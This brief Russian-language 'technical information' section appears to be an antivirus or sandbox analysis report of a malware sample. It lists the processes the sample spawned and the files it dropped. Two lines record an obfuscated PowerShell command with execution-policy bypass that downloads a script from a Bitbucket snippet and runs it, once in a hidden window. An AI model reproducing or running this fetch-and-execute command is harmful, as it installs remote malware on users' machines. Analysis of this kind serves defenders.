Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Nop -ep Bypass -c (I'w'r('https://bitbucket.org/!api/2.0/snippets/newwork123social/gq4Rkk/a14ddd6b601f3d0d4294da78787016ea57ebbf16/files/believerstart.txt') -useB) | .('{#}{_}'.replace('_','0'...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1304
- %TEMP%\1239911.cvr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Nop -ep Bypass -c (I'w'r('https://bitbucket.org/!api/2.0/snippets/newwork123social/gq4Rkk/a14ddd6b601f3d0d4294da78787016ea57ebbf16/files/believerstart.txt') -useB) | .('{#}{_}'.replace('_','0'... (со скрытым окном)